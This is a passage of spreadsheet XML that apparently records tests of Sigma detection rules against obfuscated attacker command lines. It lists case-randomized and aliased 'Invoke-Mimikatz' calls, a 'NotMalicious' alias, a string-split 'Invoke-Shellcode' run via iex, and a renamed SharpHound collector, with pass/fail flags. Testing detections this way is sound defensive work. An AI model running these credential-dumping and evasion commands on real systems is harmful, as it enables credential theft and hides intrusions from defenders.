      <c r="G818" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H818" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I818" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J818" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K818" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="819" ht="15.75" customHeight="1" s="42">
      <c r="A819" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B819" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C819" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D819" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E819" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F819" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G819" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H819" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81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19" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K819" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="820" ht="15.75" customHeight="1" s="42">
      <c r="A820" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B820" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C820" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D820" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E820" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F820" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G820" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H820" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K820" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="821" ht="15.75" customHeight="1" s="42">
      <c r="A821" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B821" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C821" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D821" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E821" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F821" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G821" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H821" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K821" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="822" ht="15.75" customHeight="1" s="42">
      <c r="A822" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B822" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C822" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D822" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E822" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F822" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G822" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H822" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K822" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="823" ht="15.75" customHeight="1" s="42">
      <c r="A823" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B823" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C823" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D823" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E823" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I82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3" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K823" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="824" ht="15.75" customHeight="1" s="42">
      <c r="A824" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B824" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C824" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D824" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E824" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F824" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G824" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H824" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K824" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="825" ht="15.75" customHeight="1" s="42">
      <c r="A825" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B825" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C825" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D825" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E825" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F825" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G825" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H825" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K825" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="826" ht="15.75" customHeight="1" s="42">
      <c r="A826" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B826" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C826" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D826" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E826" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F826" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G826" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H826" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K826" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="827" ht="15.75" customHeight="1" s="42">
      <c r="A827" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B827" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C827" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D827" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E827" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F827" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G827" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H827" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K827" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="828" ht="15.75" customHeight="1" s="42">
      <c r="A828" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B828" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C828" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D828" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E828" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F828" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G828" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H828" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I8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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K828" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="829" ht="15.75" customHeight="1" s="42">
      <c r="A829" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B829" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C829" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D829" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E829" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F829" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G829" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H829" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82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29" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K829" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="830" ht="15.75" customHeight="1" s="42">
      <c r="A830" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B830" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C830" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D830" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E830" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F830" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G830" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H830" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K830" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="831" ht="15.75" customHeight="1" s="42">
      <c r="A831" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B831" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C831" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D831" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E831" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F831" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G831" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H831" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K831" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="832" ht="15.75" customHeight="1" s="42">
      <c r="A832" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B832" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C832" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D832" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E832" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F832" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G832" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H832" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K832" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="833" ht="15.75" customHeight="1" s="42">
      <c r="A833" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B833" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C833" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D833" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E833" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G833" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H833" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K833" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="834" ht="15.75" customHeight="1" s="42">
      <c r="A834" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B834" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C834" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D834" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E834" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F834" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G834" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H834" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K834" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="835" ht="15.75" customHeight="1" s="42">
      <c r="A835" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B835" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C835" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D835" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E835" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F835" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G835" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H835" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K835" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="836" ht="15.75" customHeight="1" s="42">
      <c r="A836" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B836" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C836" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D836" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E836" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F836" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G836" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H836" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K836" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="837" ht="15.75" customHeight="1" s="42">
      <c r="A837" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B837" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C837" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D837" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E837" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F837" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G837" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H837" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K837" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="838" ht="15.75" customHeight="1" s="42">
      <c r="A838" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B838" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C838" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D838" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E838" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F838" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G838" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H838" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K838" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="839" ht="15.75" customHeight="1" s="42">
      <c r="A839" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B839" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C839" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D839" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E839" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F839" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G839" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H839" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83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39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K839" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="840" ht="15.75" customHeight="1" s="42">
      <c r="A840" s="43" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B840" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C840" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D840" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E840" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I840" s="43" t="n"/>
      <c r="J840" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K840" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="841" ht="15.75" customHeight="1" s="42">
      <c r="A841" s="43" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B841" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C841" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D841" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E841" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F841" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G841" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H841" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I841" s="43" t="n"/>
      <c r="J841" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K841" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="842" ht="15.75" customHeight="1" s="42">
      <c r="A842" s="43" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B842" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C842" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D842" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E842" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I842" s="43" t="n"/>
      <c r="J842" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K842" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="843" ht="15.75" customHeight="1" s="42">
      <c r="A843" s="43" t="n"/>
      <c r="B843" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C843" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D843" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E843" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I843" s="43" t="n"/>
      <c r="J843" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K843" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="844" ht="15.75" customHeight="1" s="42">
      <c r="A844" s="43" t="n"/>
      <c r="B844" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C844" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D844" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E844" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I844" s="43" t="n"/>
      <c r="J844" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K844" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="845" ht="15.75" customHeight="1" s="42">
      <c r="A845" s="43" t="n"/>
      <c r="B845" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C845" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D845" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E845" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I845" s="43" t="n"/>
      <c r="J845" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K845" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="846" ht="15.75" customHeight="1" s="42">
      <c r="A846" s="43" t="n"/>
      <c r="B846" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C846" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D846" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E846" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F846" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G846" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H846" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84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846" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K846" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="847" ht="15.75" customHeight="1" s="42">
      <c r="A847" s="43" t="n"/>
      <c r="B847" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C847" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
